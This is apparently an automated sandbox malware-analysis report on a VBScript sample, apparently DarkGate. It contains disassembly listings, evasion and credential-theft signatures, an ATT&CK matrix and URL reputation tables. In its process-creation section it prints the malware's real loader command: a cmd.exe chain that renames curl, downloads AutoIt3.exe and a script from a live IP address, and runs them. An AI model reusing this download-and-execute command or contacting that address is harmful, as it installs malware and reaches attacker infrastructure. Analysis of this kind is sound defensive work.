            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342FC0 mov eax, dword ptr fs:[00000030h]6_3_04342FC0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436CFCD mov eax, dword ptr fs:[00000030h]6_3_0436CFCD
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436CFCD mov eax, dword ptr fs:[00000030h]6_3_0436CFCD
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042BC820 mov eax, dword ptr fs:[00000030h]6_3_042BC820
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DE838 mov eax, dword ptr fs:[00000030h]6_3_042DE838
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]6_3_0433281F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]6_3_0433281F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]6_3_0433281F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]6_3_0433281F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433281F mov eax, dword ptr fs:[00000030h]6_3_0433281F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]6_3_0434C860
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]6_3_0434C860
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434C860 mov eax, dword ptr fs:[00000030h]6_3_0434C860
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F844 mov eax, dword ptr fs:[00000030h]6_3_0432F844
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434A880 mov eax, dword ptr fs:[00000030h]6_3_0434A880
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]6_3_042B78EA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]6_3_042B78EA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]6_3_042B78EA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042B78EA mov eax, dword ptr fs:[00000030h]6_3_042B78EA
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043458F0 mov eax, dword ptr fs:[00000030h]6_3_043458F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043458F0 mov eax, dword ptr fs:[00000030h]6_3_043458F0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D08E0 mov edi, dword ptr fs:[00000030h]6_3_042D08E0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043708D5 mov eax, dword ptr fs:[00000030h]6_3_043708D5
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043708D5 mov eax, dword ptr fs:[00000030h]6_3_043708D5
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]6_3_043238D6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]6_3_043238D6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043238D6 mov eax, dword ptr fs:[00000030h]6_3_043238D6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432F8D9 mov eax, dword ptr fs:[00000030h]6_3_0432F8D9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0437B8D9 mov eax, dword ptr fs:[00000030h]6_3_0437B8D9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0437B8D9 mov eax, dword ptr fs:[00000030h]6_3_0437B8D9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_043388C0 mov eax, dword ptr fs:[00000030h]6_3_043388C0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0436D934 mov eax, dword ptr fs:[00000030h]6_3_0436D934
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435E933 mov eax, dword ptr fs:[00000030h]6_3_0435E933
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DB921 mov eax, dword ptr fs:[00000030h]6_3_042DB921
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A3915 mov eax, dword ptr fs:[00000030h]6_3_042A3915
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DB97F mov ecx, dword ptr fs:[00000030h]6_3_042DB97F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DB97F mov eax, dword ptr fs:[00000030h]6_3_042DB97F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042DB97F mov eax, dword ptr fs:[00000030h]6_3_042DB97F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04348958 mov esi, dword ptr fs:[00000030h]6_3_04348958
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]6_3_04335942
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]6_3_04335942
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]6_3_04335942
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04335942 mov eax, dword ptr fs:[00000030h]6_3_04335942
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435A9A9 mov eax, dword ptr fs:[00000030h]6_3_0435A9A9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435A9A9 mov eax, dword ptr fs:[00000030h]6_3_0435A9A9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A7A31 mov eax, dword ptr fs:[00000030h]6_3_042A7A31
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A7A31 mov eax, dword ptr fs:[00000030h]6_3_042A7A31
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]6_3_04324A2E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]6_3_04324A2E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324A2E mov eax, dword ptr fs:[00000030h]6_3_04324A2E
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323A0D mov eax, dword ptr fs:[00000030h]6_3_04323A0D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323A0D mov eax, dword ptr fs:[00000030h]6_3_04323A0D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0437BA75 mov eax, dword ptr fs:[00000030h]6_3_0437BA75
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0437BA75 mov eax, dword ptr fs:[00000030h]6_3_0437BA75
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D2A60 mov eax, dword ptr fs:[00000030h]6_3_042D2A60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D2A60 mov eax, dword ptr fs:[00000030h]6_3_042D2A60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338A60 mov eax, dword ptr fs:[00000030h]6_3_04338A60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04338A60 mov eax, dword ptr fs:[00000030h]6_3_04338A60
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D6A45 mov eax, dword ptr fs:[00000030h]6_3_042D6A45
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4A50 mov ecx, dword ptr fs:[00000030h]6_3_042A4A50
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D0A50 mov eax, dword ptr fs:[00000030h]6_3_042D0A50
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04366A49 mov eax, dword ptr fs:[00000030h]6_3_04366A49
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04366A49 mov ecx, dword ptr fs:[00000030h]6_3_04366A49
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432FAB0 mov eax, dword ptr fs:[00000030h]6_3_0432FAB0
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042C9AAF mov eax, dword ptr fs:[00000030h]6_3_042C9AAF
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432EAB6 mov eax, dword ptr fs:[00000030h]6_3_0432EAB6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432EAB6 mov eax, dword ptr fs:[00000030h]6_3_0432EAB6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0432EAB6 mov ecx, dword ptr fs:[00000030h]6_3_0432EAB6
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04339AB9 mov eax, dword ptr fs:[00000030h]6_3_04339AB9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04353ABB mov eax, dword ptr fs:[00000030h]6_3_04353ABB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04353ABB mov eax, dword ptr fs:[00000030h]6_3_04353ABB
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov eax, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0434FAAE mov ecx, dword ptr fs:[00000030h]6_3_0434FAAE
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328A80 mov eax, dword ptr fs:[00000030h]6_3_04328A80
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]6_3_04326AFC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]6_3_04326AFC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04326AFC mov eax, dword ptr fs:[00000030h]6_3_04326AFC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]6_3_042A4AF9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]6_3_042A4AF9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A4AF9 mov eax, dword ptr fs:[00000030h]6_3_042A4AF9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345AEC mov eax, dword ptr fs:[00000030h]6_3_04345AEC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04345AEC mov eax, dword ptr fs:[00000030h]6_3_04345AEC
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0435DAE9 mov eax, dword ptr fs:[00000030h]6_3_0435DAE9
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04323ADF mov eax, dword ptr fs:[00000030h]6_3_04323ADF
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04359AC8 mov eax, dword ptr fs:[00000030h]6_3_04359AC8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04359AC8 mov eax, dword ptr fs:[00000030h]6_3_04359AC8
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E0B2F mov eax, dword ptr fs:[00000030h]6_3_042E0B2F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042E0B2F mov eax, dword ptr fs:[00000030h]6_3_042E0B2F
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04337B30 mov eax, dword ptr fs:[00000030h]6_3_04337B30
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_0433AB37 mov eax, dword ptr fs:[00000030h]6_3_0433AB37
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]6_3_04342B3D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]6_3_04342B3D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04342B3D mov eax, dword ptr fs:[00000030h]6_3_04342B3D
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04357B20 mov eax, dword ptr fs:[00000030h]6_3_04357B20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04357B20 mov eax, dword ptr fs:[00000030h]6_3_04357B20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04353B20 mov eax, dword ptr fs:[00000030h]6_3_04353B20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04353B20 mov eax, dword ptr fs:[00000030h]6_3_04353B20
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04328B10 mov eax, dword ptr fs:[00000030h]6_3_04328B10
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324B0A mov eax, dword ptr fs:[00000030h]6_3_04324B0A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04324B0A mov ecx, dword ptr fs:[00000030h]6_3_04324B0A
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]6_3_042A1B65
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]6_3_042A1B65
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]6_3_042A1B65
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]6_3_042A1B65
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042A1B65 mov eax, dword ptr fs:[00000030h]6_3_042A1B65
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_04339B6B mov eax, dword ptr fs:[00000030h]6_3_04339B6B
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D9B54 mov eax, dword ptr fs:[00000030h]6_3_042D9B54
            Source: C:\bpzs\Autoit3.exeCode function: 6_3_042D9B54 mov eax, dword ptr fs:[00000030h]6_3_042D9B54
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48630 SetUnhandledExceptionFilter,_set_new_mode,4_2_00007FF7F8D48630
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D482B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7F8D482B4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48BB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7F8D48BB4
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48D54 SetUnhandledExceptionFilter,4_2_00007FF7F8D48D54

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 94.228.169.143 2351Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -h "user-agent: curl" -o autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & autoit3.exe szkzjr.au3
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -h "user-agent: curl" -o autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & autoit3.exe szkzjr.au3Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\bpzs.exe bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\bpzs\Autoit3.exe Autoit3.exe szkzjr.au3Jump to behavior
            Source: Autoit3.exe, 00000006.00000002.384426094.0000000000366000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Autoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\bpzs\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\bpzs\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\bpzs\Autoit3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\bpzs\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\bpzs\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D48AA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7F8D48AA0

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Autoit3.exe PID: 6116, type: MEMORYSTR
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D34958 calloc,calloc,strchr,strncpy,strchr,inet_pton,strncpy,strchr,strtoul,strchr,strtoul,getsockname,WSAGetLastError,free,free,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,_cwprintf_s_l,_cwprintf_s_l,4_2_00007FF7F8D34958
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D323A0 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,4_2_00007FF7F8D323A0
            Source: C:\bpzs\bpzs.exeCode function: 4_2_00007FF7F8D17500 strncmp,strncmp,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,4_2_00007FF7F8D17500
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts12
            Command and Scripting Interpreter
            Path Interception112
            Process Injection
            1
            Virtualization/Sandbox Evasion
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium2
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts221
            Scripting
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts112
            Process Injection
            LSASS Memory21
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Native API
            Logon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Ingress Tool Transfer
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)221
            Scripting
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingData Transfer Size Limits113
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1313188 Sample: 1.vbs Startdate: 23/09/2023 Architecture: WINDOWS Score: 100 29 Snort IDS alert for network traffic 2->29 31 Multi AV Scanner detection for domain / URL 2->31 33 Found malware configuration 2->33 35 6 other signatures 2->35 7 wscript.exe 1 2->7         started        process3 dnsIp4 27 94.228.169.143, 2351, 49713, 49714 SSERVICE-ASRU Russian Federation 7->27 37 System process connects to network (likely due to code injection or exploit) 7->37 39 VBScript performs obfuscated calls to suspicious functions 7->39 41 Windows Scripting host queries suspicious COM object (likely to drop second stage) 7->41 11 cmd.exe 3 7->11         started        signatures5 process6 file7 23 C:\bpzs\bpzs.exe, PE32+ 11->23 dropped 14 bpzs.exe 2 11->14         started        17 Autoit3.exe 11->17         started        19 conhost.exe 11->19         started        21 bpzs.exe 2 11->21         started        process8 file9 25 C:\bpzs\Autoit3.exe, PE32 14->25 dropped

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            1.vbs3%ReversingLabsWin32.Trojan.Generic
            1.vbs12%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\bpzs\Autoit3.exe0%ReversingLabs
            C:\bpzs\Autoit3.exe3%VirustotalBrowse
            C:\bpzs\bpzs.exe0%ReversingLabs
            C:\bpzs\bpzs.exe0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://94.228.169.143:2351Cw0%Avira URL Cloudsafe
            http://94.228.169.143:2351/bpzszuqi~0%Avira URL Cloudsafe
            http://darkgate.com0%Avira URL Cloudsafe
            http://94.228.169.143:23510%Avira URL Cloudsafe
            https://go.mic0%Avira URL Cloudsafe
            http://94.228.169.143:2351pace0%Avira URL Cloudsafe
            http://94.228.169.143:2351/msibpzszuqiqb0%Avira URL Cloudsafe
            http://94.228.169.143:2351/0%Avira URL Cloudsafe
            http://darkgate.comU0%Avira URL Cloudsafe
            http://94.228.169.143:2351cm0%Avira URL Cloudsafe
            http://94.228.169.143:2351/bpzszuqi~2%VirustotalBrowse
            http://94.228.169.143:2351/1%VirustotalBrowse
            http://94.228.169.143:2351temkw0%Avira URL Cloudsafe
            http://darkgate.com0%VirustotalBrowse
            https://go.microso0%Avira URL Cloudsafe
            http://go.micr0%Avira URL Cloudsafe
            http://94.228.169.143:2351/F0%Avira URL Cloudsafe
            http://94.228.169.143:2351/bpzszuqi0%Avira URL Cloudsafe
            http://94.228.169.143:2341/msibpzszuqi0%Avira URL Cloudsafe
            http://94.228.169.143:2351/msibpzszuqi0%Avira URL Cloudsafe
            http://94.228.169.143:23511%VirustotalBrowse
            http://94.228.169.143:2351/bpzszuqi3?0%Avira URL Cloudsafe
            http://94.228.169.143:2351/tem0%Avira URL Cloudsafe
            http://94.228.169.143:2351O0%Avira URL Cloudsafe
            http://94.228.169.143:2351/msibpzszuqi7%VirustotalBrowse
            http://94.228.169.143:2351tem0%Avira URL Cloudsafe
            http://94.228.169.143:2351/tem1%VirustotalBrowse
            http://94.228.169.143:2341/msibpzszuqi1%VirustotalBrowse
            http://94.228.169.143:2351/bpzszuqi3?2%VirustotalBrowse
            http://94.228.169.143:2351/bpzszuqi7%VirustotalBrowse
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://94.228.169.143:2351/true
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://94.228.169.143:2351/bpzszuqitrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://94.228.169.143:2351/msibpzszuqitrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/JAutoit3.exe, 00000006.00000002.384435840.0000000000379000.00000002.00000001.01000000.00000006.sdmp, Autoit3.exe.4.drfalse
              high
              http://94.228.169.143:2351bpzs.exe, 00000004.00000002.375550889.0000011FBD440000.00000004.00000020.00020000.00000000.sdmptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://darkgate.comAutoit3.exe, 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://go.micAutoit3.exefalse
              • Avira URL Cloud: safe
              unknown
              http://94.228.169.143:2351Cwbpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://curl.haxx.se/libcurl/c/curl_easy_setopt.htmlbpzs.exe.2.drfalse
                high
                http://94.228.169.143:2351/bpzszuqi~wscript.exe, 00000001.00000003.366674421.00000185DFDE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.366821514.00000185DFDEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.366650857.00000185DFDE6000.00000004.00000020.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://94.228.169.143:2351pacebpzs.exe, 00000004.00000002.375550889.0000011FBD448000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://94.228.169.143:2351/msibpzszuqiqbbpzs.exe, 00000005.00000002.383511096.000001CC77550000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.autoitscript.com/autoit3/bpzs.exe, 00000004.00000003.375497683.0000011FBD465000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe.4.drfalse
                  high
                  https://curl.haxx.se/docs/http-cookies.htmlbpzs.exe, bpzs.exe, 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000004.00000000.366883591.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000002.383565658.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe, 00000005.00000000.375671616.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmp, bpzs.exe.2.drfalse
                    high
                    https://curl.haxx.se/docs/http-cookies.html#bpzs.exefalse
                      high
